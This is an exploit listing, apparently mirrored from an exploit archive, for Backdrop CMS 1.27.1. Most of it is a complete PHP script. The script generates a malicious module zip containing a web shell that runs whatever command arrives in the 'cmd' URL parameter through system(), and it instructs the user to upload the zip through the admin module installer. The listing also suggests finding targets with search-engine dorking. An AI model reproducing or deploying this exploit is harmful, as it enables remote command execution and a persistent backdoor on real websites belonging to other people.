Share
## https://sploitus.com/exploit?id=PACKETSTORM:189764
=============================================================================================================================================
    | # Title     : Backdrop CMS 1.27.1 PHP COde Injection Vulnerability                                                                        |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |
    | # Vendor    : https://github.com/backdrop/backdrop/releases/download/1.27.1/backdrop.zip                                                  |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking ฤฐn Google Or Other Search Enggine.
    
    [+] Code Description: Backdrop CMS 1.27.1 - Remote Command Execution Exploit in PHP
    
       (Related : https://packetstorm.news/files/id/178631/ Related CVE numbers:  ) .
    	
    [+] save code as poc.php.
    
    [+] Usage: php script.php [url]
    
    [+] PayLoad :
    
    <?php
    
    function create_files() {
        $info_content = <<<EOL
    type = module
    name = Block
    description = Controls the visual building blocks a page is constructed
    with. Blocks are boxes of content rendered into an area, or region, of a
    web page.
    package = Layouts
    tags[] = Blocks
    tags[] = Site Architecture
    version = BACKDROP_VERSION
    backdrop = 1.x
    
    configure = admin/structure/block
    
    ; Added by Backdrop CMS packaging script on 2024-03-07
    project = backdrop
    version = 1.27.1
    timestamp = 1709862662
    EOL;
    
        $shell_info_path = "shell/shell.info";
        if (!file_exists(dirname($shell_info_path))) {
            mkdir(dirname($shell_info_path), 0777, true); // ุฅู†ุดุงุก ุงู„ู…ุฌู„ุฏ ุฅุฐุง ู„ู… ูŠูƒู† ู…ูˆุฌูˆุฏู‹ุง
        }
        file_put_contents($shell_info_path, $info_content);
    
        $shell_content = <<<EOL
    <html>
    <body>
    <form method="GET" name="<?php echo basename(\$_SERVER['PHP_SELF']); ?>">
    <input type="TEXT" name="cmd" autofocus id="cmd" size="80">
    <input type="SUBMIT" value="Execute">
    </form>
    <pre>
    <?php
    if(isset(\$_GET['cmd'])) {
        system(\$_GET['cmd']);
    }
    ?>
    </pre>
    </body>
    </html>
    EOL;
    
        $shell_php_path = "shell/shell.php";
        file_put_contents($shell_php_path, $shell_content);
    
        return [$shell_info_path, $shell_php_path];
    }
    
    function create_zip($info_path, $php_path) {
        $zip_filename = "shell.zip";
        $zip = new ZipArchive();
        if ($zip->open($zip_filename, ZipArchive::CREATE) === TRUE) {
            $zip->addFile($info_path, 'shell/shell.info');
            $zip->addFile($php_path, 'shell/shell.php');
            $zip->close();
        }
        return $zip_filename;
    }
    
    function main($url) {
        echo "Backdrop CMS 1.27.1 - Remote Command Execution Exploit\n";
        sleep(3);
    
        echo "Evil module generating...\n";
        sleep(2);
    
        list($info_path, $php_path) = create_files();
        $zip_filename = create_zip($info_path, $php_path);
    
        echo "Evil module generated! $zip_filename\n";
        sleep(2);
    
        echo "Go to $url/admin/modules/install and upload the $zip_filename for Manual Installation.\n";
        sleep(2);
    
        echo "Your shell address: $url/modules/shell/shell.php\n";
    }
    
    if ($argc < 2) {
        echo "Usage: php script.php [url]\n";
    } else {
        main($argv[1]);
    }
    
    ?>
    
    
    
    
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================